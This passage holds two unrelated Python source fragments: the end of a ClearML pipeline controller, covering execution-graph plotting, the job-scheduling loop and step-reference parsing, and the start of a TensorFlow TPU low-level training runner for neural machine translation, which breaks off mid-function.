            # applied `or {}` to list.append()'s return value (always None), so a
            # None parameter override was appended as-is; the fallback now wraps
            # the appended value itself.
            node_params.append((node.job.task_parameter_override if node.job else node.parameters) or {})
            # sankey_node['label'].append(node.name)
            # sankey_node['customdata'].append(
            #     '<br />'.join('{}: {}'.format(k, v) for k, v in (node.parameters or {}).items()))
            sankey_node['label'].append(
                '{}<br />'.format(node.name) +
                '<br />'.join('{}: {}'.format(k, v if len(str(v)) < 24 else (str(v)[:24]+' ...'))
                              for k, v in (node.parameters or {}).items()))
            sankey_node['color'].append(self._get_node_color(node))
            for p in parents:
                sankey_link['source'].append(p)
                sankey_link['target'].append(idx)
                sankey_link['value'].append(1)
        nodes = next_nodes

    # make sure we have no independent (unconnected) nodes
    single_nodes = []
    for i in [n for n in range(len(visited)) if n not in sankey_link['source'] and n not in sankey_link['target']]:
        single_nodes.append(i)

    # create the sankey graph
    dag_flow = dict(
        link=sankey_link,
        node=sankey_node,
        textfont=dict(color='rgba(0,0,0,0)', size=1),
        type='sankey',
        orientation='h'
    )
    table_values = self._build_table_report(node_params, visited)

    # hack, show single node sankey
    if single_nodes:
        singles_flow = dict(
            x=list(range(len(single_nodes))), y=[1] * len(single_nodes),
            text=[v for i, v in enumerate(sankey_node['label']) if i in single_nodes],
            mode='markers',
            hovertemplate="%{text}<extra></extra>",
            marker=dict(
                color=[v for i, v in enumerate(sankey_node['color']) if i in single_nodes],
                size=[40] * len(single_nodes),
            ),
            showlegend=False,
            type='scatter',
        )
        # only single nodes
        if len(single_nodes) == len(sankey_node['label']):
            fig = dict(data=[singles_flow], layout={
                'hovermode': 'closest', 'xaxis': {'visible': False}, 'yaxis': {'visible': False}})
        else:
            # both graphs: sankey on top (y 0.2-1.0), singles scatter below
            dag_flow['domain'] = {'x': [0.0, 1.0], 'y': [0.2, 1.0]}
            fig = dict(data=[dag_flow, singles_flow],
                       layout={'autosize': True,
                               'hovermode': 'closest',
                               'xaxis': {'anchor': 'y', 'domain': [0.0, 1.0], 'visible': False},
                               'yaxis': {'anchor': 'x', 'domain': [0.0, 0.15], 'visible': False}
                               })
    else:
        # create the sankey plot
        fig = dict(data=[dag_flow], layout={'xaxis': {'visible': False}, 'yaxis': {'visible': False}})

    # report DAG
    self._task.get_logger().report_plotly(
        title='Pipeline', series='Execution Flow', iteration=0, figure=fig)
    # report detailed table
    self._task.get_logger().report_table(
        title='Pipeline Details', series='Execution Details', iteration=0, table_plot=table_values)
def _build_table_report(self, node_params, visited):
    # type: (List, List) -> List[List]
    """
    Create the detailed table report on all the jobs in the pipeline

    :param node_params: list of node parameters
    :param visited: list of nodes
    :return: Table as List of List of strings (cell)
    """
    # turn this controller task's own web page URL into a template with
    # {project}/{task} placeholders so we can link to any other task
    page_url = self._task.get_output_log_web_page()
    page_url = page_url.replace('/{}/'.format(self._task.project), '/{project}/')
    task_link_template = page_url.replace('/{}/'.format(self._task.id), '/{task}/')

    rows = [["Pipeline Step", "Task ID", "Task Name", "Status", "Parameters"]]
    for name, param in zip(visited, node_params):
        a_node = self._nodes[name]
        param_str = str(param)
        if len(param_str) > 3:
            # remove {} from string
            param_str = param_str[1:-1]
        step_name = name
        if a_node.base_task_id:
            step_name += '\n[<a href="{}"> {} </a>]'.format(
                task_link_template.format(project='*', task=a_node.base_task_id), 'base task')
        rows.append([
            step_name,
            self.__create_task_link(a_node, task_link_template),
            a_node.job.task.name if a_node.job else '',
            self.__get_node_status(a_node),
            param_str,
        ])
    return rows
@staticmethod
def _get_node_color(node):
    # type: (PipelineController.Node) -> str
    """
    Return the node color based on the node/job state
    :param node: A node in the pipeline
    :return: string representing the color of the node (e.g. "red", "green", etc)
    """
    if not node:
        return ""
    job = node.job
    if node.executed is not None:
        # the node already finished, one way or another
        if job and job.is_failed():
            return "red"  # failed job
        if job and job.is_cached_task():
            return "darkslateblue"  # reused a cached task
        if not job or job.is_completed():
            return "blue"  # completed job
        return "royalblue"  # aborted job
    if job:
        # job exists but has not finished: queued vs. running
        return "#bdf5bd" if job.is_pending() else "green"  # lightgreen=queued
    if node.skip_job:
        return "gray"  # skipped job
    return "lightsteelblue"  # pending job
def _force_task_configuration_update(self):
    """Store the serialized pipeline DAG on the controller Task (if any)."""
    pipeline_dag = self._serialize()
    if not self._task:
        return
    # noinspection PyProtectedMember
    self._task._set_configuration(
        name=self._config_section, config_type='dictionary', config_dict=pipeline_dag)
def _daemon(self):
    # type: () -> ()
    """
    The main pipeline execution loop. This loop is executed on its own dedicated thread.

    Each iteration: wait on the stop event (which doubles as the polling
    sleep), detect completed/timed-out jobs, fire completion callbacks,
    launch every node whose parents have all executed, persist the pipeline
    state, and refresh the execution plot. Exits when all nodes are done,
    the pipeline time limit is exceeded, or a stop was requested.
    :return:
    """
    pooling_counter = 0
    launched_nodes = set()
    last_plot_report = time()
    # NOTE(review): this condition only checks that a stop-event object exists;
    # the actual stop *request* is detected by wait() returning True below.
    while self._stop_event:
        # stop request (wait() also serves as the polling sleep; first pass is near-instant)
        if self._stop_event.wait(self._pool_frequency if pooling_counter else 0.01):
            break

        pooling_counter += 1

        # check the pipeline time limit
        if self._pipeline_time_limit and (time() - self._start_time) > self._pipeline_time_limit:
            break

        # check the state of all current jobs
        # if no a job ended, continue
        completed_jobs = []
        force_execution_plot_update = False
        for j in self._running_nodes:
            node = self._nodes[j]
            if not node.job:
                continue
            if node.job.is_stopped():
                completed_jobs.append(j)
                # executed is the task id on success, False (not None) on failure
                node.executed = node.job.task_id() if not node.job.is_failed() else False
                if j in launched_nodes:
                    launched_nodes.remove(j)
            elif node.timeout:
                # abort jobs that ran longer than their per-node timeout (seconds)
                started = node.job.task.data.started
                if (datetime.now().astimezone(started.tzinfo) - started).total_seconds() > node.timeout:
                    node.job.abort()
                    completed_jobs.append(j)
                    node.executed = node.job.task_id()
            elif j in launched_nodes and node.job.is_running():
                # make sure update the execution graph when the job started running
                # (otherwise it will still be marked queued)
                launched_nodes.remove(j)
                force_execution_plot_update = True

        # update running jobs
        self._running_nodes = [j for j in self._running_nodes if j not in completed_jobs]

        # nothing changed, we can sleep
        if not completed_jobs and self._running_nodes:
            # force updating the pipeline state (plot) at least every 5 min.
            if force_execution_plot_update or time()-last_plot_report > 5.*60:
                last_plot_report = time()
                self.update_execution_plot()
            continue

        # callback on completed jobs
        if self._experiment_completed_cb or self._post_step_callbacks:
            for job in completed_jobs:
                job_node = self._nodes.get(job)
                if not job_node:
                    continue
                if self._experiment_completed_cb:
                    self._experiment_completed_cb(self, job_node)
                if self._post_step_callbacks.get(job_node.name):
                    self._post_step_callbacks[job_node.name](self, job_node)

        # Pull the next jobs in the pipeline, based on the completed list
        next_nodes = []
        for node in self._nodes.values():
            # check if already processed or needs to be skipped
            if node.job or node.executed or node.skip_job:
                continue
            completed_parents = [bool(p in self._nodes and self._nodes[p].executed) for p in node.parents or []]
            if all(completed_parents):
                next_nodes.append(node.name)

        # update the execution graph
        for name in next_nodes:
            if self._launch_node(self._nodes[name]):
                # NOTE(review): node.job may be None here if a pre-step callback
                # skipped the node -- this print would then raise; confirm upstream
                print('Launching step: {}'.format(name))
                print('Parameters:\n{}'.format(self._nodes[name].job.task_parameter_override))
                self._running_nodes.append(name)
                launched_nodes.add(name)
                # check if node is cached do not wait for event but run the loop again
                if self._nodes[name].executed:
                    pooling_counter = 0
            else:
                getLogger('clearml.automation.controller').warning(
                    'Skipping launching step \'{}\': {}'.format(name, self._nodes[name]))

        # update current state (in configuration, so that we could later continue an aborted pipeline)
        self._force_task_configuration_update()

        # visualize pipeline state (plot)
        self.update_execution_plot()

        # quit if all pipelines nodes are fully executed.
        if not next_nodes and not self._running_nodes:
            break

    # stop all currently running jobs:
    for node in self._nodes.values():
        if node.executed is False:
            # executed == False marks a failed node -> mark the pipeline failed
            self._pipeline_task_status_failed = True

        if node.job and node.executed and not node.job.is_stopped():
            node.job.abort()
        elif not node.job and not node.executed:
            # mark Node as skipped if it has no Job object and it is not executed
            node.skip_job = True

    # visualize pipeline state (plot)
    self.update_execution_plot()

    if self._stop_event:
        # noinspection PyBroadException
        try:
            self._stop_event.set()
        except Exception:
            pass
def _parse_step_ref(self, value):
    # type: (Any) -> Optional[str]
    """
    Return the value with every step reference resolved.
    For example "${step1.parameters.Args/param}"

    :param value: parameter value (only strings are scanned for references)
    :return: the value with references substituted (non-strings returned as-is)
    """
    # non-string values cannot contain references
    if not isinstance(value, str):
        return value
    resolved = value
    for reference in self._step_ref_pattern.findall(value):
        # substitute the first occurrence of this reference with its actual value
        resolved = resolved.replace(reference, self.__parse_step_reference(reference), 1)
    return resolved
def _parse_task_overrides(self, task_overrides):
    # type: (dict) -> dict
    """
    Resolve step references (e.g. "${step1.parameters.Args/param}") in all
    task-override values.

    :param task_overrides: mapping of override field -> value
    :return: dict with the same keys, each value passed through _parse_step_ref
    """
    return {key: self._parse_step_ref(value) for key, value in task_overrides.items()}
def __verify_step_reference(self, node, step_ref_string):
    # type: (PipelineController.Node, str) -> bool
    """
    Verify the step reference. For example "${step1.parameters.Args/param}"
    :param Node node: calling reference node (used for logging)
    :param str step_ref_string: For example "${step1.parameters.Args/param}"
    :return: True if valid reference
    """
    # strip the "${" prefix and "}" suffix, then split on the dots
    parts = step_ref_string[2:-1].split('.')
    v = step_ref_string
    if len(parts) < 2:
        raise ValueError("Node '{}', parameter '{}' is invalid".format(node.name, v))
    prev_step = parts[0]
    input_type = parts[1]
    # the referenced step must be a known pipeline node
    if prev_step not in self._nodes:
        raise ValueError("Node '{}', parameter '{}', step name '{}' is invalid".format(node.name, v, prev_step))
    if input_type not in ('artifacts', 'parameters', 'models', 'id'):
        raise ValueError(
            "Node {}, parameter '{}', input type '{}' is invalid".format(node.name, v, input_type))

    # everything except a bare "id" reference needs at least one more field
    if input_type != 'id' and len(parts) < 3:
        raise ValueError("Node '{}', parameter '{}' is invalid".format(node.name, v))
    if input_type == 'models':
        # model references must look like: step.models.<input|output>.<index>.<property>
        try:
            model_type = parts[2].lower()
        except Exception:
            raise ValueError(
                "Node '{}', parameter '{}', input type '{}', model_type is missing {}".format(
                    node.name, v, input_type, parts))
        if model_type not in ('input', 'output'):
            raise ValueError(
                "Node '{}', parameter '{}', input type '{}', "
                "model_type is invalid (input/output) found {}".format(
                    node.name, v, input_type, model_type))
        if len(parts) < 4:
            raise ValueError(
                "Node '{}', parameter '{}', input type '{}', model index is missing".format(
                    node.name, v, input_type))
        # check casting
        try:
            int(parts[3])
        except Exception:
            raise ValueError(
                "Node '{}', parameter '{}', input type '{}', model index is missing {}".format(
                    node.name, v, input_type, parts))
        if len(parts) < 5:
            raise ValueError(
                "Node '{}', parameter '{}', input type '{}', model property is missing".format(
                    node.name, v, input_type))
        # the requested property must exist on the BaseModel class
        if not hasattr(BaseModel, parts[4]):
            raise ValueError(
                "Node '{}', parameter '{}', input type '{}', model property is invalid {}".format(
                    node.name, v, input_type, parts[4]))
    return True
def __parse_step_reference(self, step_ref_string):
    """
    return the adjusted value for "${step...}"
    :param step_ref_string: reference string of the form ${step_name.type.value}"
    :return: str with value
    """
    parts = step_ref_string[2:-1].split('.')
    if len(parts) < 2:
        raise ValueError("Could not parse reference '{}'".format(step_ref_string))
    prev_step = parts[0]
    input_type = parts[1].lower()
    # the referenced step must exist and have something resolvable on it
    # (a live job, a finished task id, or at least a base task)
    if prev_step not in self._nodes or (
            not self._nodes[prev_step].job and
            not self._nodes[prev_step].executed and
            not self._nodes[prev_step].base_task_id
    ):
        raise ValueError("Could not parse reference '{}', step '{}' could not be found".format(
            step_ref_string, prev_step))
    # NOTE(review): 'models' appears twice in this tuple -- harmless duplicate
    if input_type not in (
            'artifacts', 'parameters', 'models', 'id',
            'script', 'execution', 'container', 'output',
            'comment', 'models', 'tags', 'system_tags', 'project'):
        raise ValueError("Could not parse reference '{}', type '{}' not valid".format(step_ref_string, input_type))
    if input_type != 'id' and len(parts) < 3:
        raise ValueError("Could not parse reference '{}', missing fields in '{}'".format(step_ref_string, parts))

    # prefer the live job's task; fall back to the executed (or base) task id
    task = self._nodes[prev_step].job.task if self._nodes[prev_step].job \
        else Task.get_task(task_id=self._nodes[prev_step].executed or self._nodes[prev_step].base_task_id)
    task.reload()
    if input_type == 'artifacts':
        # fix \. to use . in artifacts
        artifact_path = ('.'.join(parts[2:])).replace('\\.', '\\_dot_\\')
        artifact_path = artifact_path.split('.')

        obj = task.artifacts
        # walk the dotted path through dicts / attributes
        for p in artifact_path:
            p = p.replace('\\_dot_\\', '.')
            if isinstance(obj, dict):
                obj = obj.get(p)
            elif hasattr(obj, p):
                obj = getattr(obj, p)
            else:
                raise ValueError("Could not locate artifact {} on previous step {}".format(
                    '.'.join(parts[1:]), prev_step))
        return str(obj)
    elif input_type == 'parameters':
        step_params = task.get_parameters()
        param_name = '.'.join(parts[2:])
        if param_name not in step_params:
            raise ValueError("Could not locate parameter {} on previous step {}".format(
                '.'.join(parts[1:]), prev_step))
        return step_params.get(param_name)
    elif input_type == 'models':
        # expected form: step.models.<input|output>.<index>.<property>
        model_type = parts[2].lower()
        if model_type not in ('input', 'output'):
            raise ValueError("Could not locate model {} on previous step {}".format(
                '.'.join(parts[1:]), prev_step))
        try:
            model_idx = int(parts[3])
            model = task.models[model_type][model_idx]
        except Exception:
            raise ValueError("Could not locate model {} on previous step {}, index {} is invalid".format(
                '.'.join(parts[1:]), prev_step, parts[3]))

        return str(getattr(model, parts[4]))
    elif input_type == 'id':
        return task.id
    elif input_type in (
            'script', 'execution', 'container', 'output',
            'comment', 'models', 'tags', 'system_tags', 'project'):
        # generic task property lookup by dotted path
        # noinspection PyProtectedMember
        return task._get_task_property('.'.join(parts[1:]))

    return None
@classmethod
def __get_node_status(cls, a_node):
    # type: (PipelineController.Node) -> str
    """Return a human readable status string for a pipeline node."""
    if not a_node:
        return "pending"
    if a_node.skip_job:
        return "skipped"
    job = a_node.job
    if job and job.is_cached_task():
        return "cached"
    if job and job.task:
        # the Task object is already in memory, no need to refresh its status
        return str(job.task.data.status)
    return "executed" if a_node.executed else "pending"
@classmethod
def __create_task_link(cls, a_node, task_link_template):
    # type: (PipelineController.Node, str) -> str
    """Return an HTML link to the node's task ('' when no task exists yet)."""
    if not a_node:
        return ''
    # resolve task/project ids, preferring the live job over the executed id
    task_id = project_id = None
    if a_node.job:
        job_task = a_node.job.task
        task_id, project_id = job_task.id, job_task.project
    elif a_node.executed:
        task_id = a_node.executed
        project_id = cls._task_project_lookup.get(task_id) or None
        if not project_id:
            # look up (and cache) the project of an already-executed task
            # noinspection PyBroadException
            try:
                project_id = Task.get_task(task_id=task_id).project
            except Exception:
                project_id = '*'
            cls._task_project_lookup[task_id] = project_id
    if not task_id:
        return ''
    return '<a href="{}"> {} </a>'.format(
        task_link_template.format(project=project_id, task=task_id), task_id)
|
low_level_runner.py | # Copyright 2018 Google. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train NMT with low level API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
import threading
import time
from six.moves import queue as Queue
import tensorflow as tf
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.framework import graph_io
from mlp_log import mlp_log
import metric
from utils import iterator_utils
# Dummy loss value fed into the on-device training loop before any real
# loss has been computed (see build_model's train_loop).
_INITIAL_LOSS = 1e7
# Sentinel pushed on the work queue telling the outfeed-dequeue threads to exit.
_STOP = -1
# Work-queue token requesting a single outfeed dequeue step (see predict()).
_ITEM = 1
def wrap_computation_in_while_loop(op_fn,
                                   n,
                                   host_name,
                                   include_induction_variable=False):
  """Wraps the ops generated by `op_fn` in tf.while_loop.

  Args:
    op_fn: callable building the op(s) to run on each iteration; it is called
      with the induction variable iff `include_induction_variable` is True.
    n: number of iterations to run.
    host_name: TF job/task prefix; the loop is placed on this host's CPU.
    include_induction_variable: whether `op_fn` takes the loop index.

  Returns:
    The tf.while_loop op (final induction-variable value).
  """

  def computation(i):
    # build this iteration's ops, then advance the induction variable only
    # after they ran (via the control dependency)
    ops = op_fn(i) if include_induction_variable else op_fn()
    if not isinstance(ops, list):
      ops = [ops]
    with tf.control_dependencies(ops):
      return i + 1

  with tf.device(device_for_host(host_name)):
    # parallel_iterations=1 keeps the iterations strictly sequential
    return tf.while_loop(
        lambda i: tf.less(i, n),
        computation, [tf.constant(0)],
        parallel_iterations=1)
def get_resolver(hparams):
  """Return a TPUClusterResolver for the configured master/TPU, or None."""
  # the explicit master address wins over the named TPU
  tpu_target = hparams.master or hparams.tpu_name
  if not tpu_target:
    return None
  return tf.contrib.cluster_resolver.TPUClusterResolver(tpu_target)
def get_host(resolver, hparams, host_id=0):
  """Return the TF device job/task prefix for the given host."""
  # no resolver -> single local target
  if resolver is None:
    return "/replica:0/task:0"
  if hparams.master == "local":
    return "/job:localhost/replica:0/task:0"
  job = resolver.get_job_name() or hparams.tpu_job_name or "tpu_worker"
  return "/job:{}/task:{}".format(job, host_id)
def device_for_host(host_name):
  """Return the CPU:0 device string on the given host."""
  return "{}/device:CPU:0".format(host_name)
def device_for_tpu_core(host_name, core=0):
  """Return the replicated-TPU-core device string on the given host."""
  return "{}/device:TPU_REPLICATED_CORE:{}".format(host_name, core)
class LowLevelRunner(object):
"""Run Train via direct session.run calls."""
def __init__(self,
             hparams,
             train_iterations,
             eval_steps,
             per_host_v1=False):
  """Create the runner: set up state, the TF graph/session, and init the TPU.

  Args:
    hparams: hyper-parameter object (num_shards, num_shards_per_host,
      master, tpu_name, ...).
    train_iterations: number of train steps executed per on-device loop.
    eval_steps: number of eval steps (0 disables the eval graph).
    per_host_v1: stored on the runner; not read elsewhere in this file.
  """
  tf.logging.info("TrainLowLevelRunner: constructor")

  # infeed/outfeed bookkeeping, filled in by initialize()/build_model()
  self.feature_structure = {}
  self.eval_feature_structure = {}
  self.loss = None
  self.infeed_queue = []
  self.eval_infeed_queue = []
  self.enqueue_ops = []
  self.eval_enqueue_ops = []
  self.dataset_initializer = []
  self.eval_dataset_initializer = []
  self.is_local = ((hparams.master == "") and (hparams.tpu_name is None))
  self.per_host_v1 = per_host_v1
  self.iterations = train_iterations
  self.eval_steps = eval_steps
  self.outfeed_tensors = []
  self.outfeed_names = []
  self.dequeue_ops = []
  self.predictions = {}
  self.sess = None
  self.graph = tf.Graph()
  self.hparams = hparams
  self.num_hosts = hparams.num_shards // hparams.num_shards_per_host
  with self.graph.as_default():
    self.tpu_init = [tpu.initialize_system()]
    self.tpu_shutdown = tpu.shutdown_system()
  self.resolver = get_resolver(hparams)
  # large op timeout + disabled meta-optimizer for the big TPU graph
  session_config = tf.ConfigProto(
      allow_soft_placement=True,
      isolate_session_state=True,
      operation_timeout_in_ms=600 * 60 * 1000,
      graph_options=tf.GraphOptions(
          rewrite_options=rewriter_config_pb2.RewriterConfig(
              disable_meta_optimizer=True)))
  if self.hparams.tpu_name is None:
    master = self.hparams.master
  else:
    # resolve the master address (and cluster spec) from the named TPU
    cluster_spec = self.resolver.cluster_spec()
    if cluster_spec:
      session_config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())
    master = self.resolver.get_master()
  self.sess = tf.Session(master, graph=self.graph, config=session_config)
  self.sess.run(self.tpu_init)
def initialize(self, input_fn, eval_input_fn, params):
  """Initialize all the things required for training.

  Builds per-host train/eval infeed enqueue ops (each wrapped in a host-side
  tf.while_loop), then runs the table and dataset initializers.

  Args:
    input_fn: callable(params) -> training dataset (or synthetic features).
    eval_input_fn: callable(params) -> eval dataset.
    params: mutable dict of input-pipeline parameters (batch_size,
      dataset_num_shards, dataset_index are written into it here).
  """
  tf.logging.info("TrainLowLevelRunner: initialize method")

  def get_enqueue_ops_fn(host_id):
    """Generate the enqueue ops graph function."""
    device = device_for_host(get_host(self.resolver, self.hparams, host_id))
    # only every second host (host_id even, below 2*num_infeed_workers)
    # hosts a real dataset shard; all other hosts feed zero tensors
    if host_id in range(0, self.hparams.num_infeed_workers * 2, 2):
      with tf.device(device):
        params["batch_size"] = self.hparams.batch_size
        params["dataset_num_shards"] = self.hparams.num_infeed_workers
        params["dataset_index"] = host_id // 2
        output = input_fn(params)
        if not self.hparams.use_synthetic_data:
          iterator = output.make_initializable_iterator()
          self.dataset_initializer.append(iterator.initializer)
          if host_id == 0:
            # record the feature structure (shapes/dtypes) once, from host 0
            f = iterator.get_next()
            self.feature_structure["features"] = {
                k: tf.zeros_like(f[k]) for k in f
            }
        else:
          self.feature_structure["features"] = output
        self.feature_structure["core_id"] = tf.constant([1], tf.int32)

    def enqueue_ops_fn(idx):
      """Enqueue ops function for one host.."""
      with tf.device(device):
        sharded_inputs = []
        start_idx = 0
        if host_id in range(0, self.hparams.num_infeed_workers * 2, 2):
          core_id = tf.constant(
              host_id * self.hparams.num_shards_per_host,
              shape=[1],
              dtype=tf.int32)
          if self.hparams.use_synthetic_data:
            features = output
          else:
            def true_fn():
              return iterator.get_next()

            def false_fn():
              # zeros matching the recorded feature structure
              return {
                  k: tf.zeros_like(self.feature_structure["features"][k])
                  for k in self.feature_structure["features"]
              }

            # only pull real data on the iteration assigned to this worker
            features = tf.cond(
                tf.equal(idx % self.hparams.num_infeed_workers, host_id // 2),
                true_fn, false_fn)
          sharded_inputs.append(
              data_nest.flatten({
                  "features": features,
                  "core_id": core_id
              }))
          start_idx = 1
        # all remaining cores on this host get zero tensors plus their core id
        for i in range(start_idx, self.hparams.num_shards_per_host):
          sharded_inputs.append(
              data_nest.flatten({
                  "features": {
                      k: tf.zeros_like(self.feature_structure["features"][k])
                      for k in self.feature_structure["features"]
                  },
                  "core_id":
                      tf.constant(
                          host_id * self.hparams.num_shards_per_host + i,
                          shape=[1],
                          dtype=tf.int32)
              }))
        infeed = tpu_feed.InfeedQueue(
            number_of_tuple_elements=len(sharded_inputs[0]))
        self.infeed_queue.append(infeed)

        def tpu_ordinal_fn(shard_index_in_host):
          return shard_index_in_host % self.hparams.num_shards_per_host

        return infeed.generate_enqueue_ops(
            sharded_inputs, tpu_ordinal_function=tpu_ordinal_fn)

    return enqueue_ops_fn

  def get_eval_enqueue_ops_fn(host_id):
    """Generate the enqueue ops graph function."""
    # eval data is sharded evenly across all hosts
    params["dataset_num_shards"] = self.num_hosts
    params["dataset_index"] = host_id
    with tf.device(
        device_for_host(get_host(self.resolver, self.hparams, host_id))):
      dataset = eval_input_fn(params)
      iterator = dataset.make_initializable_iterator()
      self.eval_dataset_initializer.append(iterator.initializer)

      def enqueue_ops_fn():
        """Enqueue ops function for one host."""
        per_host_sharded_inputs = []
        control_deps = []
        for _ in range(self.hparams.num_shards_per_host):
          # serialize get_next() calls so the per-core batches stay ordered
          with tf.control_dependencies(control_deps):
            features = iterator.get_next()
          self.eval_feature_structure["features"] = features
          flattened_inputs = data_nest.flatten(self.eval_feature_structure)
          control_deps.extend(flattened_inputs)
          per_host_sharded_inputs.append(flattened_inputs)
        infeed = tpu_feed.InfeedQueue(
            number_of_tuple_elements=len(per_host_sharded_inputs[0]))
        self.eval_infeed_queue.append(infeed)

        def tpu_ordinal_fn(shard_index_in_host):
          return shard_index_in_host % self.hparams.num_shards_per_host

        return infeed.generate_enqueue_ops(
            per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_fn)

      return enqueue_ops_fn

  with self.graph.as_default():
    if self.iterations > 0:
      for i in range(self.num_hosts):
        self.enqueue_ops.append(
            wrap_computation_in_while_loop(
                get_enqueue_ops_fn(i),
                n=self.iterations,
                host_name=get_host(self.resolver, self.hparams, i),
                include_induction_variable=True))
    if self.eval_steps > 0:
      for i in range(0, self.num_hosts):
        self.eval_enqueue_ops.append(
            wrap_computation_in_while_loop(
                get_eval_enqueue_ops_fn(i),
                n=self.eval_steps,
                host_name=get_host(self.resolver, self.hparams, i)))
    init_tables = tf.tables_initializer()
  self.sess.run(init_tables)
  self.sess.run(self.dataset_initializer)
def build_model(self, model_fn, params):
  """Build the TPU model and infeed enqueue ops.

  Args:
    model_fn: estimator-style model function (features, labels, mode, params).
    params: parameter dict passed through to model_fn.
  """
  tf.logging.info("TrainLowLevelRunner: build_model method")

  def tpu_train_step(loss):
    """Generate the TPU graph."""
    del loss
    values = self.infeed_queue[0].generate_dequeue_op(tpu_device=0)
    unflattened_inputs = data_nest.pack_sequence_as(self.feature_structure,
                                                    values)
    features = unflattened_inputs["features"]
    core_id = unflattened_inputs["core_id"]
    # each core's infeed carried zeros except on the data-owning core, so a
    # cross-replica sum broadcasts the full batch to every core; each core
    # then reshapes and gathers its own slice by core_id
    # (NOTE(review): relies on the zero-filled infeed built in initialize())
    new_features = {}
    for k in features:
      s = features[k].shape.as_list()
      s = [self.hparams.num_shards, s[0] // self.hparams.num_shards] + s[1:]
      new_features[k] = tf.squeeze(
          tf.gather(
              tf.reshape(tpu_ops.cross_replica_sum(features[k]), s), core_id),
          [0])
    estimator_spec = model_fn(new_features, None, tf.estimator.ModeKeys.TRAIN,
                              params)
    loss, train_op = estimator_spec.loss, estimator_spec.train_op
    with tf.control_dependencies([train_op]):
      return tf.identity(loss)

  @tpu_function.on_device_training_loop
  def train_loop():
    return training_loop.repeat(self.iterations, tpu_train_step,
                                [_INITIAL_LOSS])

  def tpu_eval_step():
    """Generate the TPU graph."""
    values = self.eval_infeed_queue[0].generate_dequeue_op(tpu_device=0)
    unflattened_inputs = data_nest.pack_sequence_as(
        self.eval_feature_structure, values)
    features = unflattened_inputs["features"]
    estimator_spec = model_fn(features, None, tf.estimator.ModeKeys.PREDICT,
                              params)
    # record prediction names/tensors so the host can dequeue them later
    for k, v in six.iteritems(estimator_spec.predictions):
      self.outfeed_names.append(k)
      self.outfeed_tensors.append(v)
    with tf.device(
        device_for_tpu_core(get_host(self.resolver, self.hparams))):
      outfeed_enqueue_ops = tpu_ops.outfeed_enqueue_tuple(
          self.outfeed_tensors)
    with tf.control_dependencies([outfeed_enqueue_ops]):
      return tf.no_op()

  @tpu_function.on_device_training_loop
  def eval_loop():
    if self.eval_steps > 0:
      return training_loop.repeat(self.eval_steps, tpu_eval_step, [])
    else:
      return tf.no_op()

  def train_eval_step():
    # one epoch: full train loop, then (via control dependency) the eval loop
    with tf.control_dependencies(train_loop()):
      return eval_loop()

  def train_eval_loop():
    return training_loop.repeat(self.hparams.max_train_epochs,
                                train_eval_step, [])

  def create_dequeue_ops(host_id):
    """Create outfeed dequeue ops."""
    dequeue_ops = []
    tensor_dtypes = []
    tensor_shapes = []
    for v in self.outfeed_tensors:
      dequeue_ops.append([])
      tensor_dtypes.append(v.dtype)
      tensor_shapes.append(v.shape)
    # dequeue from every core on this host, then concat per tensor
    for i in range(self.hparams.num_shards_per_host):
      with tf.device(
          device_for_host(get_host(self.resolver, self.hparams, host_id))):
        outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
            dtypes=tensor_dtypes, shapes=tensor_shapes, device_ordinal=i)
        for j, item in enumerate(outfeed_tensors):
          dequeue_ops[j].append(item)
    for j in range(len(outfeed_tensors)):
      dequeue_ops[j] = tf.concat(dequeue_ops[j], axis=0)
    return dequeue_ops

  with self.graph.as_default():
    if self.eval_steps <= 0:
      # train-only graph
      (self.loss,) = tpu.shard(
          train_loop,
          inputs=[],
          num_shards=self.hparams.num_shards,
          outputs_from_all_shards=False,
      )
    else:
      # combined train+eval graph, compiled separately from execution
      (
          self.compile_op,
          self.train_eval_op,
      ) = tpu.split_compile_and_shard(
          train_eval_loop,
          inputs=[],
          num_shards=self.hparams.num_shards,
          outputs_from_all_shards=False)
    if self.eval_steps > 0:
      # name -> dequeue-op mapping per host
      for i in range(0, self.num_hosts):
        self.dequeue_ops.append({})
        host_dequeue_ops = create_dequeue_ops(i)
        for j, dequeue_tenor in enumerate(host_dequeue_ops):
          self.dequeue_ops[i][self.outfeed_names[j]] = dequeue_tenor
    global_initializer = tf.global_variables_initializer()
    local_initializer = tf.local_variables_initializer()
    self.sess.run(global_initializer)
    self.sess.run(local_initializer)
    graph_io.write_graph(
        self.graph.as_graph_def(add_shapes=True), self.hparams.out_dir,
        "graph.pbtxt")
    # Saver must be created inside the graph context to see the variables
    self.saver = tf.train.Saver()
def train(self,
          start_step,
          train_steps,
          num_threads=2,
          checkpoint_threads=None):
  """Run the Train loop on the TPU device.

  Args:
    start_step: global step offset used for logging and checkpoint names.
    train_steps: total number of steps to run (must be a multiple of
      self.iterations).
    num_threads: number of background checkpoint-writer threads (0 disables
      checkpointing).
    checkpoint_threads: optional caller-owned thread-slot list; when None a
      fresh list is created and joined before returning.
  """
  tf.logging.info("TrainLowLevelRunner: train for %d steps in total",
                  train_steps)

  def infeed_thread_fn(sess, enqueue_ops):
    # feed the infeed queues once per on-device loop invocation
    assert train_steps % self.iterations == 0
    steps = train_steps // self.iterations
    for _ in range(steps):
      sess.run([enqueue_ops])

  def checkpoint_thread_fn(saver, sess):
    # NOTE: closure reads cur_step at call time, so the checkpoint is named
    # after the step count reached when the thread was started
    saver.save(sess, self.hparams.out_dir + "/model.ckpt-%d" % (start_step + cur_step))

  infeed_thread = threading.Thread(
      target=infeed_thread_fn, args=(self.sess, self.enqueue_ops))
  infeed_thread.start()

  cur_step = 0
  thread_id = 0
  need_join = False
  if checkpoint_threads is None and num_threads > 0:
